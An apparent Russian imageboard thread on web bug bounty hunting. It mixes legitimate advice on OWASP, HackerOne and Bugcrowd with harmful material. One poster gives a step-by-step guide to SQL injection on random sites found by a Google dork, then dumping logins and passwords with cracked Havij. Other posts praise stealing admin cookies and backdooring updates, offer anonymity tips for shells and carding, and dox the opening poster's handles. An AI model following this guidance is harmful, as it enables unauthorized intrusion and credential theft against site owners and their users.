Багхантинга/пентеста/информационной безопасности тредCап, харкач, надеюсь ты достаточно ночной. Сегодня мы поговорим о таком фарме денежных знаков, как багхантинг. Коротко, это поиск уязвимостей как в вебе, так и в настольном софте. Я пока интересуюсь только вебом.Не жди от меня готовых решений, как вот прямо сейчас взять и заработать много денег. Я могу лишь помочь тебе и дать удочку, чтобы выловить рыбку. Распишу, как вкатиться, с чего начать, что изучать, плюсы и минусы.Бумажным безопасникам, которые ололо составляют "матрицы угроз", ковыряются в ГОСТах, чтобы написать очередную должностную инструкцию, которая нахуй никому не нужна и остальное время устанавливающие антивирусы на рабочих местах, вход в тред запрещен, ибо вы не практики, а говно на ложечке, но по своему опыту общения мните себя ниебаца спецами. Черные шляпы првиетствуются, потому что я и сам баловался заливкой шеллов и сливом баз[spoielr](работал не по ру, майор иди нахуй.)[/spoiler]Итак, поехали.Пикрелейтед выплата за баг, который я недавно нашел по программе поиска уязвимостей в Гугле.
Итак, плюсы:1. Достаточно легко вкатиться, чтобы начать зарабатывать на простых багах, типа XSS, которые есть везде.2. С ростом навыков, скиллов и чутья на баги, есть возможность зарабатывать реальное бабло и не работать ни дня, используя багхантинг как основной источник заработка.3. В этой сфере все связано, и начав изучать топ уязвимостей по OWASP, вы автоматически будете прокачить навыки везде, в программировании, в серверах, Линуксах и прочем.Например, начав изучть SQLi(sql инъекции), чтобы разбираться в этом самому, на уровне понимания, а не на уровне "запустил sqlmap и он нашел все сам", вам наверняка придется разбираться, почему это приложение на, например php уязвимо к этой атаке. Потом, если есть возможность, через sqli вы захотите залить шелл, и вы начнете изучать уже устройство серверов, начнете гуглить, как раскрыть абсолютный путь, чтобы залить шелл, узнаете где располагаются и как найти конфигурационные файлы. Потом наверняка захотите побаловаться с Kali. И начнете с простейших консольных команд типа ls, pwd и так далее. Потом начнете поднимать уже свои сервера, чтобы детектить атакаи типа ssrf, ххe, rce.То есть я хочу сказать, что здесь все связано между собой, одно вытекает из другого. Я часто читаю тут историю, как анон начинает изучать, допустим, php html js, напишет какую-то сраную гостевую книгу, и дропает из-за отстсутвия мотивации. Здесь же теже php html js вам придется изучать для того, чтобы не созидать, а ломать, и зарабатывать деньги.Есть огромное коммьнюти, даже со своими локальными мемчиками, лол, которое зарабатывает на этом деньгиСпустя какое то время вы поймете, что получаете реальные знания, и дальше решаете уже сами, чем заниматься, уйти в черные шляпы, например, и сливать базы за бабло, или пойти в белые, искать баги, и уведомлять об этом владельцев.Минусы:1. Придется много читать, но только на первом этапе. Если голова светлая и есть чуйка на тонкие места, где есть баг, то проблем не будет2. Как и везде нужна настойчивость.Ну, что тут сказать, наверное не всем это дано или просто неинтересно.
>>144869013 (OP)Ты хотя бы предложения научись нормально составлять, а то нихера не понятно ты пытаешься донести. и разметка, да.
мистер робот в треде. все в кали линукс.
С чего начать, при условии что искать баги мы будем в вебе.1. Нагуглить топ 10 уязвимостей owasp2. Начать изучать каждую из них по отдельности, начав с простого, к сложному.3. Основыне уязвимости, кторые вы будете встречать, это XSS, Open Redirect, LFI, Path Traversal, SQLi.4 Гуглите эти сокращения и читаете статьи. Начать, как не странно, советую с античата, там полно годноты для начинающих, развежанной до самых мелочей.5. Если с английским хорошо, это лишний плюс, потому за бугром пишут дохуя статей/презентаций по этой теме.6. Дальше практикуетесь. Рекомендую приложение damn vulnerable web app, как вариант, ну или просто идете в гугл и ищите уязвимые сайты.7. Как только вы уяснили базовые знания по этим типам уязвимостям, переходите к RCE. Это самое сладкое, что может найти багхантер.На пике sqli, которую я нашел по программе Фейсбука.
>>144869272Клавиатура новая, печатаю быстро, так что возможны опечатки. Если что-то не нравится просто съеби.
>>144869389Это 1C ? Ты не продаван случаем?
ОП, можешь пояснить за свою безопасность? какими средствами обеспечиваешь анонимность?
>>144869430Вот с новыми постами стало понятней, продолжай
Это в кратце.Далее, если чувствуете в себе уверенность, можете идти, искать баги и зарабатывать.Итак, основные площадки, где надо завести аккаунты.https://hackerone.com/http://bugcrowd.com/Регистрируетесь, ищите программу, которая вас заинтересовала, ищите баги, отправляете репорт,получаете деньги.Напоминаю, тем кто заинтересовался, я вам даю удочку, а рыбку лоиить вам, поэтому если тут не понятно, гуглите сокращения. В дальнейшем вы только и будете, что гуглить, читать и развиваться.Самое главное правило участия в этих программах, никогда сука не просите денег, при общении с сотрудниками, не будьте как индусы, лол, которые в каждом репорте вымаливают деньги.Сейчас я отойду покурить, и продолжим. И поговорим об инструментарии.На пике XSS в Яндексе, заплатили за нее тыщ 20 вроде, рублей.
>>144869511Мне не нужна безопасность, я не черная шляпа же. Работаю исключительно по белому.
>>144869511Ты не понял о чём тред, лалка.>>144869013 (OP)Как-то слабо вериться в такую хуйню. 5к баксов за строчку кода? Пиздец.
>>144869714Я про твое прошлое.Связка вафля в кафе + тор + браузер с плагином впном + постоянная смена юзер агента будет более менее безопасной?За тред спасибо, сохраню его на жестком диске
ОП как тебе яндекс толока?
>>144869720Я понимаю о чем тред, но решил вклиниться и спросить ОПа о его прошлом
И тут я охуел.А если у меня на хуявее П7, например, Гугле Плей Мьзик вылетает, когда я ставлю телефон на зарядку, сколько мне заплатят за такой открытый ололо-баг?
ОП бля нахуй, создал тред, так отвечай со скоростью света, куда ты сыбался?
>>14486965820к за то, что нашёл всплывающее окно со стандартной надписью или я чего-то не понимаю?
Тут. Продолжаем и говорим про инструментарий. На вопросы отвечу потом.Вам понадобятся.Kali linux. Да, да, сколько бы не смеялись здешние недалекие, это швейцарский нож для работы пентестере. ЗДесь есть практически все, что нужно на начальном этапа.Далее вам нужно будет изучть nmap. Множество багов и денег кроется в банально незакрытых портах, на которых крутиться какой-нибудь чувствительный сервис.
>>144870122Возможно себе заработать на стабильное пропитание?Нахуй нужен ОП, который не отвечает на вопросы, а пиздит сам с собой?
>>144870078Не понимаешь. ОП нашел уязвимость на одном из их сервисов и выполнил её
>>144869720>Как-то слабо вериться в такую хуйню. 5к баксов за строчку кода? Пиздец.>>144870078>20к за то, что нашёл всплывающее окно со стандартной надписью или я чего-то не понимаю?Да, вы не понимаете. Такая простая XSS моежет привести к компрометации аккаунта на гугле.
>>144870288То есть компрометации? Грубо говоря, хакир с помощью этой уязвимости может залесть ко мне на Гугел Драйв и украсть все мои фоточки?
>>144870122Накидай начальных статей, плз. Есть опыт программирования, вкатиться будет легко, если покажешь самый оптимальный путь.
ОП, продолжай
>>144870374Он может скинуть тебе ссылку, которая может выполнить что угодно javascript-овое.
>>144870122Я пизжю для тех, кому это интеерсно, на вопросы отвечу по возможности же.Далее, пожалуй самый главный инструмент, это BURP SUITE. Что-то а его вы должны изучить вдоль и поперек. В кратце, именно его вы будете использовать основную часть времени, занимаясь фаззингом веб приложений.
>>144870410Например, блять? Ты разговариваешь с дауном.
Залейте потом тред на архивач, я спать пойду
>>144869013 (OP)>античатОрнул.
>>144870429Ты сам говоришь, что индусы занимаются этим ради заработка. Если представить, сколько человек этим занимается, какова вероятность, что баг, который я найду, не нашёл кто-то до меня? Это пальцем в пизду.
>>144870429BURP SUITE можно купить или своровать. Оптимально вообще, начиная разбираться с топ уявимостями по OWASP работать с ним.Далее, следует помнить, что баги, как и дьявол, кроется в деталях. Поэтому мы должны увеличсить поверхность атаки, поэтому нам пригодиться сканер директорий, я советую dirb, входит в Kali Linux.
>>144870458Например, последовательно отметит все письма и удалит их, нажимая на кнопки.
>>144870608Вероятность есть, да, чтобы тебе заплатили, ты должен быть первым, кто сообщит о баге. Но индусы на то и индусы, что они как правило присылают низкокачественные репорты, сгенерированные каким-нибудь сканером, и их отшивают.
>>144870608Двачую. В фейсбуке или гугле хуй найдешь
>>144869013 (OP)Сейчас нет постоянной и стабильной работы в пентесте, а та, которую предлагают, совершенно не оплачивается.
>>144870725Ебать, ну так чтобы нормально в этом понимать, надо иметь охуенный бэкграунд, вышку там, знать яваскрипт. Кого ты тут из /b/ можно научить таким тонкостям, если основная масса занимается кручением рулеток, фапом и сидением в вебм тредах? А не основная масса и так знает про этот способ заработка.
>>144870539>>144870631Ну и напоследок, преследуя цель расширения поверхности атаки, следует не забывать про поддомены. Для этого вам понадобятсья knockpy.py и sublist3r.py, которые брутит/ищет интересные поддомены.Таким образом мой топ, для тех, кто решит начать:BurpSuiteKalinmapdirbknockpy.py sublist3r.pyС этим вы бюудете работать в первую очередь. ПОтом, если пойдете дальше, будете писать уже свои инструменты или пользоваться уже готовыми, но более специалтзтрованными, под конкретную багу.
>>144869013 (OP)>Пикрелейтед выплата за багНо ведь если баг действительно годный, на чёрном рынке за него можно выручить значительно больше.
>>144870932Но тогда ты получаешь минус в карму.
>>144870872Когда я вкатывался, я ничего этого не знал. Как я писал выше, я начал изучть, например XSS, а потом уже и js с html сам приложился. Вышка есть, да, непрофильная, но она не нужна, абсолютно, лол, вся инфа есть в открытых источниках. Тысячи людей занимаются этим как работой или хобби, кто-то успешнее, кто-то менее, но сам факт.
>>144871040ОП ответь пжл на вопрос>>144869846
>>144869013 (OP)> [spoielr](работал не по ру, майор иди нахуй.)[/spoiler]НАШЕЛ БАГ В ГУЛЕ@НЕ УМЕЕШЬ В ТЕГИ
>>144871040Я посмотрел зал славы искателей багов о котором написано на сайте гугла, сколько надо хуярить, чтобы туда попасть?https://bughunter.withgoogle.com/0x0A
>>144870809Гормоны принял?Есть работа.
Ну и напоследок, как я говорил, вам придется читать много по этой теме, много можно почерпнуть из твиттера тех людей, которые эти занимаются долго и упорно. Далее не забывайте читать всякие презентации с конференций типа blackhat. Там дохуя годноты.Ну и для примера, посмотрите, сколько тут бабаок крутиться.https://hackerone.com/hacktivity?sort_type=latest_disclosable_activity_at&filter=type%3Aall&page=1По ссылке окрытые/закрытые репорты с выплатами.
оп формулирует как олигофрен, но в общем , по делу говорит.20к$-от-пашки-за-баги-в-телеграмме-кун
>>144871168Тебя вносят автоматически, как только твою багу примут, заплатят. Ну и ты сам должен завести там аккаунт.Алсо все эти залы слава очень охуенный буст для ваших портфолио, особенно безопасников, ящитаю.
хосспаде как же я ору с опавсе, кто более-менее понимают о чем этот даун пытается говорить наверняка тоже орут так, как никогда не ораливторой курс бакалавриата на какой-нибудь околофинансовой безопасностим, судя по изложению, пониманию вопроса и вообще картинкамхотя, чем больше тебе народу поверит, тем лучше лолперед новым годом был такой же хацкер на собеседовании, а может это и был оп
За сколько лет изучения этой темы, ты смог получать бабосы?
>>144871337Ну так сколько надо багов захуярить? 10 в месяц? Ты там есть?
>>144871400А вот бумажный безопасник порвался.
booom, когда ты уже наиграешьсы с говеными xssками и за нормальный оффенс возьмешься?
>>144871421Даже если ты найдешь один баг на 100$ ты там окажешься. Суть зала славы не в количестве.
>>144871261Это только будут платить за баги тех сайтов, которые зареганы? Vimeo, Slack и т д
>>144871461Лол, я не бум, но сам его почитываю иногда.
>>144871205Где? За 30к сидеть в офисе под присмотром маменькиного сынка - директора? Ебал я такую работу. Мимо_закончил_топовый_вуз.
>>144871400Тоже проиграл. Ждем продолжение сериала.
>>144871429да ладно, дауна увидеть можно уже по тому, что ты в открытых источниках ищешь информацию лоли как, спиздил сканя паспорта с чьегй нибудь файлопомойки?дауны серьезно думают, что стоящие рассказывают на конференциях или выкладывают в веб, дарквеб, да куда угоднокофеварки иди дальше хацкай, лол
>>144871480Да, у которых есть денежное вознаграждение. Некторые программы егоне предусматривают а просто говорят спасибо. Нужно читать описание программы.
>>144871461Алиса, ты опять нахуярилась?
>>144869013 (OP)Тут, конечно, про вк, но суть ясна, я думаюУже сколько раз собирался написать пост об этом, да все времени не было. А тут у меня пердак нехило так подгорел, так что ловите мессадж о том, почему НЕ НУЖНО УЧАСТВОВАТЬ В БАГБАУНТИ ОТ ВК. Это конечно же только мое мнение, вы можете быть с ним несогласны, особенно, если вы работаете в компании, где пароли в базе хранятся в открытом виде, да, ВК?Начну издалека. Искать уязвимости это бесспорно весело, круто, и все такое. Сегодня ты потными ладошками набираешь "... OnError=alert...", а завтра хвастаешься перед одноклассниками алертом на каком-нибудь крупном сайте. Но с приходом такой "классной" штуки как "багбаунти", люди стали забывать, что хакером тебя делает не умение вставлять кавычку или писать html теги во все инпуты, а грамотная эксплуатация найденного бага.Приведу простой пример. Ты нашел уязвимость в личных сообщениях на форуме поддержки какой-нибудь CMS. Первый вариант - ты посылаешь всем сообщения с мессаджем "hacked by vasya pupkin" и имеешь с этого ебанное ничего. Или второй вариант - ты пиздишь куки админа, льешь шелл, лезешь вглубь, на поддомены, находишь какой-нибудь сервак с апдейтами и добавляешь в новую версию бекдор, который заражает тысячи серверов, на которые у тебя теперь есть доступ. И это только один вариант развития событий, все зависит только от фантазии хакера.Так вот. Багбаунти по сути убивает наповал такое понятие как "эксплуатация" уязвимости, за редким исключением, типа SSRF -> Zabbix RCE, когда ты пробуешь набить цену своему багу. Да, ты всегда можешь попробовать раскрутить баг и попросить больше денег, но с каких пор хакер должен блять торговаться, унижаться и отвоевывать каждый ссаный килобакс? Зачем вообще ставить себе искусственные рамки в духе "никакой соц инженерии" и ограничивать свою хеккерскую фантазию в плане эксплуатации найденного бага?Кароче к чему я это все: мало найти уязвимость, важно уметь ее использовать с максимальной выгодой для себя.А теперь вернемся к сути. Вот репорт на хакерване - https://hackerone.com/reports/181823Объясняю суть - чувак нашел уязвимость вконтакте, которая позволяет отправить ЛЮБОМУ ПОЛЬЗОВАТЕЛЮ сообщение со своим JAVASCRIPT-кодом, который ИСПОЛНИТСЯ В БРАУЗЕРЕ ЖЕРТВЫ. Если еще понятнее - через эту багу можно угонять аккаунты пачками ваще не напрягаясь. А теперь посмотрите на то, во сколько оценили данную уязвимость.500 баксов.500.Нужно ли мне говорить, что из такой уязвимости можно выжать миллионы баксов? Нужно ли мне говорить, что вконтакте подтирается вашими репортами и подобные "подачки" лишь демонстрируют их отношение к багхантерам и к безопасности своих пользователей. Ну, или другой маловероятный вариант - в отделе безопасности вконтакте работают неквалифицированные специалисты, неспособные грамотно оценить критичность уязвимости, хотя мне в это слабо верится.Но я все же склоняюсь к тому, что ВК (а точнее мейлру) хуй клало на вас всех, и раз написано "максимум 500 бачей за XSS" значит и заплатят они 500 бачей за XSS. И не важно, что после такого отношения к багам любой нормальный человек мягко говоря охуеет и пойдет продавать уязвимости на черном рынке, где получит в сотни раз больше и в результате чего пострадают пользователи соц. сети.Им похуй, 500 значит 500.На этом я все. Цените свой труд и уважайте себя.
>>144871543Какая разница, даун он или не даун? Заработал же ОП 5к баксов у Гугла и 20к рублей у Яндекса? Значит, что-то могёт.
>>144871543Порнуху с компов пиздить.
>>144871522>>144870809Не, можно пойти в банк, и ебаться сутками с переводами, ебаться с гостами-хуестами, ублажать проверку, рвать жопу и получать 40к. Или пойти в структуры, но и там однохуйственная хуйня. Не, нахуй. Мимо_криптограф.
>>144871543Ты ебанутый и не понмиаешь, о чем идет оечь. Речь идет о том, чтобы найти баг. Баг может крыться в чем угодно, тем более в открытых источниках. Есть дохъуя примеров, когда платили за обычный листинг директорий, который предстваб себе, нуб, был найдем с помощью обычного нунлдорка в открытом источнике. Рот твой ебал.
>>144871606алиса в самолёте на Гуантаномо, если ты понимаешь о чём я.
>>144871677Сорян за опечатки, как я говорил, печатаю быстро на новой клавиатуре, лол.
>>144871702Я про другую.
>>144871543порву тебе шаблон : 99% охуенных тем которые реально приносят кеш из паблика цепляются
>>144871673криптограф в плане анализа алгоритмов или просто знаешь как tls настроить?
>>144871625Я понимаю твой багет, потому что сам с этим сталкивался. Сама по себе программа вк не очень лояльна к багхантеру.Ну а по поводу эксплуатацию и всего такого. Вот тебе наглядный пример, что багхантинг это не оквычка и не alert(xss)http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
>>144871010Я серая шляпа, предпочту юзать баги в собственных интересах (не обязательно ради прямого профита), если это возможно, нежели палить разработчикам.
>>144871780другая наверно бахнула и биберов жизни учит
>>144871834Аналитик жи
>>144871893Залупа скорее.
>>144871847Дополню, в этом репорте прекрасно все. От чукйи багхантера до эксплуатации бага. При том что сама уязвимость ImageMagick довольно бородатая и как видите ее не пофиксили даже на фейсбуке.
>>144869013 (OP)Говно занятие. Нестабильно, опасно, аутично.Девелопером заработаю больше и стабильнее. И пользу миру принесу.А минимальное знание вашего OWASP позволяет мне писать бездырные приложения.
>>144869013 (OP)>хаккирь>проебал разметку
>>144871908скинь фейко-мыльце, былоб классно пару вопросов обсудить.
>>144871991>опасноАбсолютно не опасно, если ты работаешт с теми платформами, что я привел выше. Где ты увидел опасность то? Я же не про то, чтобы базу слить с шопа какого-нибудь. Тебя сами приглашают тут, чтобы ты нашел уязвимсоть.>аутичноТебе просто не знакомо чувство первооткрывателя в чем-то. Это круто, на самом деле. И еще денег приносит.
>>144872048Зачем, няша? Задавай вопросы здесь.
>>144872042Печатаю быстро на новой клаве, заебали уже.
Добавьте в архив, пожалуйста. Тред интересен, но сижу я за компьютером из последних сил. Уже утро начинается, а я не спал целые сутки.
Знаете про домены с точкой на конце?https://surveys.jetbrains.com./s3/https://surveys.portswigger.net./s3/https://surveys.research.microsoft.com./s3/https://insidersurveys.windows.com./s3/
>>144872075>первооткрывателя>еще одна ебаная xssка пропущенная криворуким индусом
>>144871991Дополню.>Девелопером заработаю больше и стабильнееВкусовщина. Выще ссылку я кидал, чувак за один день заработал 40k. Успешные багхантеры зарабатывают и больше и без страха, что их выкинут из их уютного офиса Рога и Копыта.
>>144872126без ssl збс:http://surveys.jetbrains.com./s3/http://surveys.portswigger.net./s3/http://surveys.research.microsoft.com./s3/http://insidersurveys.windows.com./s3/
>>144872084я с ойпада, неудобно набивать. если коротко хотел спросить про вычислительную сложность конструкции с нулевым разглашением zksnark
>>144872138>еще одна xssка проебанная на крутом сервисеА кто ее допустил, абсолютно похуй. Тут, как нельзя кстати, работает "Сперва добейся". Конкуренция тут большая, тысячи голодных индусов блять, но только некоторые находят действительно алмаз среди кучи говна.
Оп, поясни уже за анонимизацию
>>144872279Если работаешь не по ру, то вообще похуй.Если работаешь по ру - то тут похуй, захотят поймать, поймают.Все.
>>144872177Лол, это как
Бля, как то дня два назад по телеку показывали маня-конторку, которой правил школьник из вуза, где всех работников принимают только после прохождения полиграфа. Как же я тогда проиграл - просто 10/10 маньки.
>>144872279Ну а так, естетсвенно на какой-нибудь залитый шелл не надо заходить с домашнего ойпи, лол.Отойду покурить.
>>144872264нинию, няша. Я диванный онолитег.
>>144871625Указал бы хоть первоисточникhttp://vk.com/club82661420
>>144872385уже 10 лет захожу, брат жив нр зависимость есть>>144872385
ОП - хуила, збсь попиздел скринов из чужих репортов. Удивительно что про форумы ничего не сказал. И кали твой ебаный не всегда нужен. Прямые руки и желание развиваться. Форумы собснаforum.antichat.rurdot.org/forumforum.exploit.in
>>144872432няша, я тоже
Как вкатиться в иб в 21 год?
>>144872385>>144872317Это понятно, не срать где живешь. Но что ты использовал, какие средства?Дабл, трипл впн купленные на античате поверх тора к примеру?
Ну и в качестве мотивации скажу, что я далеко не успешный багхантер, активно вктился я в это год назад где-то, и начинал, как писал выше, да-да, со статей на ачате про XSS и sql.Сначала это было просто хобби, я срубал там 100 баксов, тут, потом начал изучать плотнее, переш на более сложные баги, типа XXE. В итоге за год я заработал около 2 миллионов деревянных, что неплохо.>>144872540Но это мои репорты, ктоме одного скрина с XSS через багу в AngularJS.
Тест
>>144869658Привет, lalka! Я давно тебя искал.Dean0n3dОн же: lalka-bugbounty https://yandex.com/bugbounty/researchers/lalka-bugbounty/Он же: lalka https://hackerone.com/lalkaОн же: twitter.com/0x01alka
>>144872702А с какой литературы начать?
>>144872775Хех, да похуй мне.>>144872798Не знаю, я всю инфу искал исключительно в инете.
>>144872775лолед
>>144871326За какой срок?
>>144872857Я не он, но отвечу, что 20k ему могли заплатить и единовременно, если баг крутой.
>>144872694Поделись, ну что ты в самом деле>>144872824
>>144869947Я уже зарепортил так что не думай об этой проблеме
>>144872910Ну я же не знаю, чем ты занимаешься, лол. Если там шеллы покупаешь/заливаешь, хватит и тора с впнкой, если серъезное и грязное дерьмо, типа кардинга, то тут ничего не поможет, если захотят взять за жопу.
>>144869947До тех пор, пока ты не пояснишь по хардкору, как это воспроизвести и что стоит и почему - ноль.
Как понимаешь, какой сайт выбрать для тестирования?
>>144872985>что сбоитСамофикс. Ненавижу сенсоры
>>144869947Нет, ничего не заплатят. Имеются ввиду секурные баги.
>>144872997https://2ch.hk/
>>144872981Понял, спс
>>144872997К чему душа лежит, то и выбирай. Ну и самое главное смотри описание программы, чем шире у них скоуп, то есть рамки программы, тем лучше. Тем больше шансов найти что-то. Нол как я гвоорил, следует помнить одну простую вещь, баги есть везде.
>>144873042Бля, я про методику выбора говорю. Ты же не тыкаешься в каждое свободное поле, на всех сайтах алерт
>>144873121Вот кстати, да, я расписал с чего начать и инструментов, но про методику и забыл. Сейчас скину пару ссылок.
У тебя телеграм есть?
>>144869013 (OP)Какой же из тебя веб-хантер, когда ты школьную разметку двача от руки печатал? Я схороню для потомков этот пост.
>>144872892Так в том-то и речь, что единовременно - это хуйня. Можно и на ставках один раз выиграть крупную сумму. Интереснее как раз соотношение затраченного времени и получаемого профита на дистанции.
>>144873121Вот, держи.http://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016А вообще на https://bugcrowd.com/ есть отдельный англоязычный форум, там много интересного можно почерпнуть в плане методологии поиска, хинтов и так далее.
Мама, я хакнул двощ
>>144873231Это ты, друг?
>>144869013 (OP)>[spoielr](работал не по ру, майор иди нахуй.)[/spoiler]Ты по-моему туповат для взломов, программирования и компьютер сайнс в целом.
>>144873317Это фича такая
>>144873232Естетсвенно, что это непостоянный/нестабильный заработок, ты же не на окладе сидишь. Но да, если уделять этому пару часов в день, с учетом что у тебя уже есть багаж знаний, проблем быть не должно, а скорее наоборот, чем дальше ты учишься, тем сильнее возрастает шанс, что найдешь какую-нибудь RCE на гугле и уедешь на всю жизнь хиковать на теплые острова.
>>144869013 (OP)>2017>пассивная xss на доменах гугла и фейсбукаразве индусе не все поля еще сбрутили, в чем секрет успеха?
>>144873317НО ЮЧеловек говорит дело. Ясно и доходчиво, без воды.>144872775-кун
>>144873410https://hackerone.com/hacktivity?sort_type=latest_disclosable_activity_at&filter=type%3Aall&page=1Баги есть везде. У некоторых ноги растут из-за того, что необновили какой-то код, у некоторых, наоборот, добавили несекурный функционал, какую-нибудь форму обратной связи, и вот пожалуйста, бага.
>>144873160ping
>>144869389> советую с античата
>>144873499вся работа в том, чтобы находить новые проекты крупных компаний и натаскивать программу на все страницы этих проектов?
>>144873637И что такого. Для тех, кто только вкатывается, только там можно найти инфу на русском языке по базовым атакам. Дальше то понятно, нужно копать уже в сторону серьезных статей из докладов/коференций на английском языке, со всяикими техниками обхода фильтров и так далее.
>>144873637А че не так? Если ты считаешь что "2005 года статья - слишком староооое. Несите мне новое", то тебя жаль
>>144873691Не совсем понял. Все доступные программы, которые предоставляют вознаграждения висят там в окрытом доступе. Читай описание, выбирай понравившуюся и вперед.
Телегу кинь, у тебя пм в твиттере недоступны
>>144873747Хотя пизжю конечно, не только там, rdot годный, но там по серьезнее, сразу можно не понять, лол.
Аноничи, заглянул к вам на огонек изза святой темы поднятой тут. Да уебёт кидающихся гавном ярость аллаха. Советую начать с SQL injection это самый сок потому как профит увидете сразу. Будете пиздошить чужие акки читать почты и т.д., кароче пару вечеров скрасите точно.Как начать?В гугле по запросуfiletype:php inurl:"index.php?id="вываливается список ссылокВида http://ssaniysite.com/index.php?id=1вам надо вставить кавычку ' (та что рядом с кнопкой энтер)должно выйти такhttp://ssaniysite.com/index.php?id=1'Если контент пропал или вывалилась ошибка mysql error sintax блабла то вы уже рядом. Чтоб не згружать на первое время работой в консольке и языком запросов SQL качните софт havij 1.16 годная тема выводит красиво инфу, но кривая как сука(кароч для начала пойдет) потом SQLmap потыкайте мануалы есть.Как научится крутить в SQL injection ручную вот тред на антидевчате:https://forum.antichat.ru/threads/43966/Скачать можно хачивидж тут:https://happy-hack.ru/sql/8726-havij-v116-pro-portable-cracked.htmlТакже советую установить этот плагин и юзать для хека тока фаерчпокас:https://addons.mozilla.org/ru/firefox/addon/hackbar/
>>144873812Ну и нахуй ты мне нужен, довн? Говна пожуй.
Оп, а что если найдя уберкритичный баг гугловский запросить у них бабла немеряно напрямую.Написать им: Я нашел такой баг (дать беспалевный пруф) вы даете мне 100 000$.
>>144873812Хуй знает, вроде окрыта была личка, открыл вроде, пиши, если вопросы есть какие.
>>144873886Это дурной тон и минус в карму. Если бага крутая что прям пиздец, они заплатят тебе дпже больше, чем указано у них по правилам, не сомневайся. У многих кампаний максимальный предел бага неограничен.
>>144869013 (OP)Слей базу регистрационных мыл сайта https://2ch.hk/b плизз)) )) )
>>144870932Мой хороший приятель любит говорить "делай добро и бросай его в море". Очень ему нравится этот мультик.Пока его не заебало ИТ и он им занимался вплотную, месяц с доходом ~20 килозелени считался у него средненьким таким, ничего особенного. При этом он мог совершенным рандомхуям подкинуть бабла, или сделать дорогой подарок мне предлагал музыкального оборудования на 3 килозелении в 2010 г., но я не принял подарок, хоть и было лестно.Сейчас он пилит проект своей мечты, называть не буду, т.к. моментальный деанон, но скажу, что это производство. Благодаря принципу бросается добра в море, он познакомился и подружился с кучей крутейших людей, которые ему в этом проекте помогают. И он счастлив, хотя денег у него сейчас особо и нет, всё вваливает в проект.Я к чему. Карма, не карма, но он искренне стремится сделать мир лучше для людей. И ловит благодаря этому счастье. Продажа бага на черном рынке может оказаться сиюминутно более прибыльной операцией, чем репорт владельцам, но в долгосрочной перспективе это не улучшает мир, а наоборот. В мире, ставшем чуть лучше, лучше живётся и тебе. Почему-то это знание не оседает в массовом сознании россиян.
>>144873886>дать беспалевный прНу и да, без Proof-of-concept'а у тебя багу не примут а вежливо пошлют.
>>144873990Двачую карму. Все, кто занимается багхантингом, жуткие кармадрочеры. Я вот и сам таким стал, теперь я бы не стал точно дестроить или причинять вред, например, какому-нибудь сайту, а отписал бы одмину, чтобы он пофиксил.
>>144874052>>144873990Хуйня, пытался я бросать рыбу, хуй чо вышло ,всем похуй и добра мне не вернулось, уже лет 5 прошло.
>>144873990Работник безопастности Яндекса, залогиньтесь, а то я чуть не заплакал.
>>144873990Нет ни добра ни зла. Пора бы уже закрыть эту тему.
>>144874123Лол, я не безопасник ни разу, и тем более не в Яндексе. Хотя околоайтишник, скажем так.
>>144874101Просто ты рассчитывал на положительную обратную связь, меркантильный гандон :3
>>144872126> Знаете про домены с точкой на конце?Знаю твою мамку с точкой на пизде.
>>144874198Зачем ты философские абсолюты пытаешься спроектировать на практику с совершенно очевидной точной отчета?
>>144874333>спроецироватьСенсор
>>144874333Ты серьёзно веришь в карму?
>>144874101Надо давать не рыбу, бро, а удочку, и обхяснить как ей пользоваться. В вот если давать рыбу, то за спиной еще скажут УХХХ, ЗАЖРАЛСЯ, СУКА, РАСКУЛАЧИТЬ БЫ ТЕБЯ. Ну как-то так.Ладно, я съебываю, если кто-то вкатится в эту тему, и заработает свои первые деньги этим направлением, то я буду рад за вас. Рад был пообщаться. Мир.
>>144874480Тут не надо никакой кармы, просто факт такой что этот ваш багхантинг это нестабильное опасное занятие для молодых (потом уже не можешь столько аутировать). Так что или ты ведёшься себя хорошо, строишь связи, отношения, и к 30-ку ты можешь уже руководить чем-то, или ты пожил быстро, умер молодым. От голода или сторчания.
>>144874567>опасноеДа с чего ты взял то?
>>144874567Тебя наоборот с распростертыми объятиями встречают, и говорят, найди баг а мы заплатим денюжку, лол. Ты не уловил сути, короче, если так думаешь.Все, теперь точно съебал.
>>144874592>>144871625
>>144874480Я - нет, кто-то да. Я склонен думать, что если ты улучшаешь по мере возможности среду обитания, от это выигрывают все, в первую очередь ты.Карма в моем случае - это просто красивое слово, которое можно использовать как эвфемизм для этой концепции.
>>144873873Бля забыл обьяснить самое главное. Уяхвимость позволяет попасть в базу данных сайта, где хранятся почты логины пароли и прочее. Часто пароли зашифрованные но часто нет. После виыкания кавычки вывалилась ошибка или пропал контент - суйте ссылку без кавычки в хачвидж жмите старт и далее он вам все покпжет. Если баг есть выведет имя базы, далее выберете ее галочкой вытащите таблицы(tables) , далее если будет users/customers и прочее выберайте и вытаскивайте столбцы (columns) там уже вы увидете id login password и прочее, выбираете нужное вам и жмете get data. Запускайте несколько хавежей и хуярьте несколько сайтов сразу. Не вышло - следующий. За 10 минут таким банальным способом 3-4 сайта точно ломаются. Удачи, кому помог не ленитесь кидайте в тред свои находки, спрашивайте советов пока мы тут
>>144873873You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '11''' at line 1Нашел на 10 стр гугла сайт, добавил 'Я хакир?
>>144874872Да ты хакир, без шуток читай чо делать дальше вот тут >>144874856
>>144874856>хачвидж >хавежей блять, ты сам понимаешь что пишешь, нет? даже гугл не понимает о чем ты тут говоришь, даун блять
>>144875081С мамашей свой так разговаривая псина деревянная. Тредом ошибся. Тут хеки одептов делают. Доебался до того как я пишу? Гугл не понимает? Для даунов есть ссылка на скачивание, там есть название на английском.
>>144875177Я в этой теме больше лет, чем ты умеешь говорить, еблан блять. Не позорься, животное ебаное.
>>144875228 Ну давай пенсионер блиц опрос или ты пиздабол?
>>144875302ну попробуй чмоша
>>144875326Как через инклуд прочитать содержимое PHP файла?
>>144875376ТЫ ПРО ПОХАПЭ, еблан?
>>144875465 фича в mysql позволяющая прочитать файл если file_priv=N ?
>>144875511load_file какой-то? что за пиздец, то пхп, то блять супер криво настроенные сервера, чо несешь даун?
эх, как же прияно дать на клык скрипткиду.
